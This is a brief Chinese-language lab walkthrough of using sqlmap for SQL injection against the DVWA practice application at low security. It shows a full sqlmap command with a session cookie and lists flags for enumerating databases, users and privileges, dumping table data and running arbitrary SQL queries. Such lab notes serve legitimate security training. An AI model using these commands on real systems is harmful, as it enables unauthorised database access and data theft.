Sqlmap注入dvwa平台low级别
CTRL + R 刷新记录可以看见cookie:
sqlmap -u "http://192.168.62.136/DVWA/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie 'PHPSESSID=o2md9cm1d24jbrpbdj1ra02os8; security=low' --current-user ##-u 接网站URL --cookie使用cookie认证 --current-user # 查询当前数据库用户
查看基本信息
1. --users # 查询所有的数据库账号
2. --dbs # 查询所有数据库
3. --schema # 查询源数据库(包含定义数据的数据)
4. -a # 查询当前user、当前数据库、主机名、当前user是否是最大权限管理员、数据库账号等
5. -D dvwa# 指定数据库
6. --current-user # 查询当前数据库用户
7. --current-db # 查询当前数据库
8. --hostname # 查看服务器的主机名
9. --Privileges -U username # 查询username的权限
10. --roles 角色
11. --tables # 查看所有的表
12. -T # 指定表
13. --columns # 查看所有的字段
14. -C # 指定字段
15. --count # 计数,查看有多少条数据
16. --exclude-sysdbs # 排除系统库
17. --dump # 查看数据
18. --start 3 # 查看第三条
19. --end 4 # 查看第四条
20. --sql-query "select * from users" # 执行语句
21. --common-columns # 暴力破解字段,应用于两种情况:①无权限读取数据。②mysql<5.0 ,没有 infomation_schema库 22. --common-tables # 暴力破解表
22. --common-tables # 暴力破解表
试试查看所有数据库:
执行成功